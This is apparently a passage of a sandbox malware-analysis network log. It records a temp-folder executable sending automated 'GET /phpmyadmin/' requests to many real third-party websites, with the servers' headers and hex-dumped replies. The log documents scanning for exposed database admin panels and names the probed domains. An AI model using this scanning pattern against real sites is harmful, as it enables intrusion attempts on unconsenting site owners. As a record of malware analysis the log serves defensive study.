                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:27 UTC13162INData Raw: 33 33 35 44 0d 0a 22 63 61 70 74 69 6f 6e 44 65 73 63 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 5d 20 7d 2c 20 65 78 63 6c 75 64 65 73 3a 27 2e 66 62 78 2d 6c 69 6e 6b 2c 2e 6e 6f 66 6f 6f 62 6f 78 2c 2e 6e 6f 6c 69 67 68 74 62 6f 78 2c 61 5b 68 72 65 66 2a 3d 22 70 69 6e 74 65 72 65 73 74 2e 63 6f 6d 2f 70 69 6e 2f 63 72 65 61 74 65 2f 62 75 74 74 6f 6e 2f 22 5d 27 2c 20 61 66 66 69 6c 69 61 74 65 20 3a 20 7b 20 65 6e 61 62 6c 65 64 3a 20 66 61 6c 73 65 20 7d 2c 20 65 72 72 6f 72 3a 20 22 50 6f 6c 6f c5 be 6b 75 20 73 61 20 6e 65 70 6f 64 61 72 69 6c 6f 20 6e 61 c4 8d c3 ad 74 61 c5 a5 22 7d 2c 0d 0a 09 73 65 6c 65 63 74 6f 72 73 3a 20 5b 0d 0a 09 09 22 2e 66 6f 6f 67 61 6c 6c 65 72 79 2d 63 6f 6e 74 61 69 6e 65 72 2e 66 6f 6f 67 61 6c 6c 65 72 79 2d
                                                                                                                                                                                                                                                                                                                                Data Ascii: 335D"captionDesc","description"] }, excludes:'.fbx-link,.nofoobox,.nolightbox,a[href*="pinterest.com/pin/create/button/"]', affiliate : { enabled: false }, error: "Poloku sa nepodarilo nata"},selectors: [".foogallery-container.foogallery-


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                7192.168.2.450608141.98.102.1944435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:21 UTC178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eshopy-katalog.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC280INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
                                                                                                                                                                                                                                                                                                                                retry-after: 600
                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC3557INData Raw: 44 44 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65
                                                                                                                                                                                                                                                                                                                                Data Ascii: DD9<!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="robots" content="noindex, nofollow, noarchive"> <title>Error 403</title


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                8192.168.2.45094023.236.62.1474435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:21 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kingsway-hk.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC662INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                location: https://www.kingsway-hk.com/phpmyadmin
                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=3600
                                                                                                                                                                                                                                                                                                                                Age: 5694
                                                                                                                                                                                                                                                                                                                                Server-Timing: cache;desc=hit, varnish;desc=hit, dc;desc=uw2-pub-1
                                                                                                                                                                                                                                                                                                                                X-Seen-By: 9WD8GAcpJgs/Ng1WkD2i0h9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLhZ4wvHcBCgqBuXgRA8LPTYm++C2XkuTvnlRFg2XiSDL,2d58ifebGbosy5xc+FRalhR/QG/c3syxi1wPYoXgvEksZKzznnnr4lR5VuVaDZa8n+RQHheSCBGTKe8fGrDS9A==,2UNV7KOq4oGjA5+PKsX47INB/bAojfHjAB2jEOw3GjkR2rxCTgaJ7/K2Kx9jhAfC
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                X-Wix-Request-Id: 1703131402.076787702411121589
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                9192.168.2.45105537.9.175.1884435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:21 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: aloeveraforever.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC160INHTTP/1.1 509
                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC2466INData Raw: 39 39 36 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 20 74 65 78 74 3d 22 62 6c 61 63 6b 22 3e 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 3e 0a 3c 74 72 3e 3c 74 64 3e 3c 69 6d 67 20 73 72 63 3d 68 74 74 70 73
                                                                                                                                                                                                                                                                                                                                Data Ascii: 996<html><head><meta charset="UTF-8"><title>The page is temporarily unavailable</title><style>body { font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body bgcolor="white" text="black"><table width="100%"><tr><td><img src=https


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                10192.168.2.450931141.98.102.1944435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:21 UTC178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eshopy-katalog.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC280INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
                                                                                                                                                                                                                                                                                                                                retry-after: 600
                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC3557INData Raw: 44 44 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65
                                                                                                                                                                                                                                                                                                                                Data Ascii: DD9<!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="robots" content="noindex, nofollow, noarchive"> <title>Error 403</title


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                11192.168.2.45105637.9.175.1884435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:21 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: aloeveraforever.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC160INHTTP/1.1 509
                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC2466INData Raw: 39 39 36 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 20 74 65 78 74 3d 22 62 6c 61 63 6b 22 3e 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 3e 0a 3c 74 72 3e 3c 74 64 3e 3c 69 6d 67 20 73 72 63 3d 68 74 74 70 73
                                                                                                                                                                                                                                                                                                                                Data Ascii: 996<html><head><meta charset="UTF-8"><title>The page is temporarily unavailable</title><style>body { font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body bgcolor="white" text="black"><table width="100%"><tr><td><img src=https


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                12192.168.2.450905216.230.253.854435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:21 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: e-art-studio.co.jp
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC164INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Length: 131
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC131INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 27 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 20 23 39 39 33 33 36 36 3b 27 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head></head><body><h1 style='text-align: center;'><span style='color: #993366;'>404 Page Not Found</span></h1></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                13192.168.2.45147223.239.22.2024435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:21 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: aexoden.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC207INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15724800; includeSubdomains
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC146INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                14192.168.2.45138485.248.129.354435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:21 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: inhodinky.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC754INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Location: https://www.inhodinky.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                Expires: Fri, 20 Dec 2024 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-Aws-Security-Level: 23
                                                                                                                                                                                                                                                                                                                                Permissions-Policy: accelerometer=(), camera=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), payment=(), usb=()
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src https: wss: blob: data: 'unsafe-eval' 'unsafe-inline'; object-src 'self'
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                Alt-Svc: h2=":443"; ma=3600
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                15192.168.2.45097246.229.230.44435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC239INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.abatek.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Length: 240
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC240INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 62 61 74 65 6b 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.abatek.sk/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                16192.168.2.45097346.229.230.44435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: abatek.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC239INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: http://www.abatek.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Content-Length: 240
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC240INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 62 61 74 65 6b 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.abatek.sk/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                17192.168.2.451449162.43.104.1454435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:22 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: nakacho.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:23 UTC345INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:22 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
